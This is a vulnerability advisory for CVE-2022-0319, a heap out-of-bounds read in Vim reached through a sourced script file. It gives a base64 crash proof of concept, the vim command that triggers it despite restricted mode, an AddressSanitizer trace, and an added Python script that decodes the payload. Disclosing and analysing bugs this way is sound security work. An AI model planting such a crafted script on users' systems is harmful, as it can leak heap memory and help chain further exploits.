Headline
CVE-2022-0319: Out-of-bounds Read in vim
Out-of-bounds Read in vim/vim prior to 8.2.
Description
A heap-based out-of-bounds (OOB) read of size 4 occurs when a user sources the Vim script file given below (loaded with -S, the way a session file is). This happens regardless of any command-line options intended to restrict Vim, such as -Z (restricted mode) and -m (modifications not allowed). The bug was found on a default Vim build (latest commit hash fd218c8a36e7ed33f7a205163690c5b7d2f31f8a at the time) on Ubuntu 20.04 for x86_64/amd64.
Proof of Concept
Here is the smallest PoC we were able to produce (base64-encoded, since it contains unprintable bytes):
$ echo -ne "CXdpMDAwMDAwMDA1MDAwMCA1MDAwMDAwMDAwMDAACiAgc2lsIW5vcm0ICAgICAgICBYXDrJPKgNn
eW9leHQgFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBRsa25lCiAgc2lsIW5vcm0ICAgI9/f3
MBYXGLJPKgNneXl5k/95eQEBAgEN/gb/3jABPQGEAQEBAT15eXl5eW1lpmUgZSsgeXlweXl5AXV1
dXV1dXV1enUwdXV1dnV1" | base64 -d > poc
$ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ':qa!'
=================================================================
==67807==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000016500 at pc 0x7f4e10795f40 bp 0x7fffa0da2520 sp 0x7fffa0da1cc8
READ of size 4 at 0x621000016500 thread T0
#0 0x7f4e10795f3f in __interceptor_memmove (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f)
#1 0x5612382d840a in vim_memsave /home/faraday/vim/src/alloc.c:604
#2 0x561238d26031 in u_save_line /home/faraday/vim/src/undo.c:373
#3 0x561238d4665c in u_saveline /home/faraday/vim/src/undo.c:3477
#4 0x561238d25615 in u_save /home/faraday/vim/src/undo.c:257
#5 0x561238d254a4 in u_save_cursor /home/faraday/vim/src/undo.c:237
#6 0x5612388b83c5 in op_addsub /home/faraday/vim/src/ops.c:2386
#7 0x561238858e66 in nv_addsub /home/faraday/vim/src/normal.c:2302
#8 0x56123884f61f in normal_cmd /home/faraday/vim/src/normal.c:1120
#9 0x5612385ac525 in exec_normal /home/faraday/vim/src/ex_docmd.c:8638
#10 0x5612385ac2e4 in exec_normal_cmd /home/faraday/vim/src/ex_docmd.c:8601
#11 0x5612385ab802 in ex_normal /home/faraday/vim/src/ex_docmd.c:8519
#12 0x56123856dd85 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2573
#13 0x56123856170e in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#14 0x561238addf98 in do_source /home/faraday/vim/src/scriptfile.c:1512
#15 0x561238adaf75 in cmd_source /home/faraday/vim/src/scriptfile.c:1098
#16 0x561238adb132 in ex_source /home/faraday/vim/src/scriptfile.c:1124
#17 0x56123856dd85 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2573
#18 0x56123856170e in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#19 0x56123855f288 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
#20 0x56123905a82d in exe_commands /home/faraday/vim/src/main.c:3091
#21 0x56123904c323 in vim_main2 /home/faraday/vim/src/main.c:774
#22 0x56123904b809 in main /home/faraday/vim/src/main.c:426
#23 0x7f4e0ed440b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#24 0x5612382d7cbd in _start (/home/faraday/vim/src/vim+0x1259cbd)
0x621000016500 is located 0 bytes to the right of 4096-byte region [0x621000015500,0x621000016500)
allocated by thread T0 here:
#0 0x7f4e10802bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
#1 0x5612382d817e in lalloc /home/faraday/vim/src/alloc.c:248
#2 0x5612382d7f29 in alloc /home/faraday/vim/src/alloc.c:151
#3 0x561239062c5c in mf_alloc_bhdr /home/faraday/vim/src/memfile.c:884
#4 0x56123905f03c in mf_new /home/faraday/vim/src/memfile.c:376
#5 0x5612387bbbda in ml_new_data /home/faraday/vim/src/memline.c:4077
#6 0x561238798cc5 in ml_open /home/faraday/vim/src/memline.c:394
#7 0x561238304457 in open_buffer /home/faraday/vim/src/buffer.c:185
#8 0x561239059185 in create_windows /home/faraday/vim/src/main.c:2861
#9 0x56123904c02e in vim_main2 /home/faraday/vim/src/main.c:705
#10 0x56123904b809 in main /home/faraday/vim/src/main.c:426
#11 0x7f4e0ed440b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f) in __interceptor_memmove
Shadow bytes around the buggy address:
0x0c427fffac50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffac60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffac70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffac80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffac90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c427fffaca0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffacb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffacc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffacd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427ffface0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffacf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==67807==ABORTING
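To see what the base64 blob above actually feeds to Vim, here is an added Python example (it is not part of the original report and not Vim's code) that decodes the PoC, splits it into the Ex command lines that :source executes, renders control bytes in Vim's ^X key notation (non-ASCII bytes as hex), and counts the CTRL-A/CTRL-X bytes, the two Normal-mode keys that Vim dispatches to nv_addsub()/op_addsub(), the frames in the trace above. The base64 text is copied from the PoC; the function names and the key-name table are this example's own.

```python
import base64
from typing import List, Tuple

# Base64 PoC exactly as published in the report above (line breaks removed).
POC_B64 = (
    "CXdpMDAwMDAwMDA1MDAwMCA1MDAwMDAwMDAwMDAACiAgc2lsIW5vcm0ICAgICAgICBYXDrJPKgNn"
    "eW9leHQgFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBRsa25lCiAgc2lsIW5vcm0ICAgI9/f3"
    "MBYXGLJPKgNneXl5k/95eQEBAgEN/gb/3jABPQGEAQEBAT15eXl5eW1lpmUgZSsgeXlweXl5AXV1"
    "dXV1dXV1enUwdXV1dnV1"
)

CTRL_A = 0x01  # <C-a>: Normal-mode "add to number", handled by nv_addsub()
CTRL_X = 0x18  # <C-x>: Normal-mode "subtract from number", same handler


def decode_poc(b64: str = POC_B64) -> bytes:
    """Return the raw bytes of the PoC file, as `base64 -d` would write them."""
    return base64.b64decode(b64)


def vim_key_name(b: int) -> str:
    """Render one byte the way Vim's :help key-notation (or `cat -v`) would."""
    if b == 0x00:
        return "<Nul>"
    if b == 0x09:
        return "<Tab>"
    if b == 0x08:
        return "<BS>"
    if b == 0x0D:
        return "<CR>"
    if b == 0x1B:
        return "<Esc>"
    if b < 0x20:
        return "^" + chr(b + 0x40)  # 0x01 -> ^A, 0x16 -> ^V, 0x18 -> ^X ...
    if b == 0x7F:
        return "^?"
    if b >= 0x80:
        return "\\x%02x" % b  # non-ASCII filler bytes, shown as hex
    return chr(b)


def split_lines(data: bytes) -> List[bytes]:
    """Split on LF the way :source reads the file; the last line carries no LF."""
    return data.split(b"\n")


def annotate(data: bytes) -> List[str]:
    """One human-readable string per Ex line, with every key byte named."""
    return [
        "%d: %s" % (i + 1, "".join(vim_key_name(b) for b in line))
        for i, line in enumerate(split_lines(data))
    ]


def count_addsub_keys(data: bytes) -> Tuple[int, int]:
    """(number of CTRL-A bytes, number of CTRL-X bytes) in the whole file."""
    return data.count(bytes([CTRL_A])), data.count(bytes([CTRL_X]))


if __name__ == "__main__":
    raw = decode_poc()
    print("decoded %d bytes, %d Ex lines" % (len(raw), len(split_lines(raw))))
    for rendered in annotate(raw):
        print(rendered)
    ctrl_a, ctrl_x = count_addsub_keys(raw)
    print("CTRL-A keys: %d, CTRL-X keys: %d" % (ctrl_a, ctrl_x))
```

Running it shows three Ex lines: a first line beginning with `wi` and a NUL byte, then two `sil!norm` commands whose keystroke argument (after a run of <BS>) mixes ^V, ^W, ^N, ^T, several ^A and one ^X with filler bytes. Because :normal executes its argument as typed keys, a script sourced with -S reaches the same op_addsub() code path as an interactive user, which is why -Z and -m do not help here.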
Impact
This vulnerability can disclose heap memory and might help bypass protection mechanisms, facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.
Acknowledgements
This bug was found by Octavio Gianatiempo and Octavio Galland from the Faraday Research Team.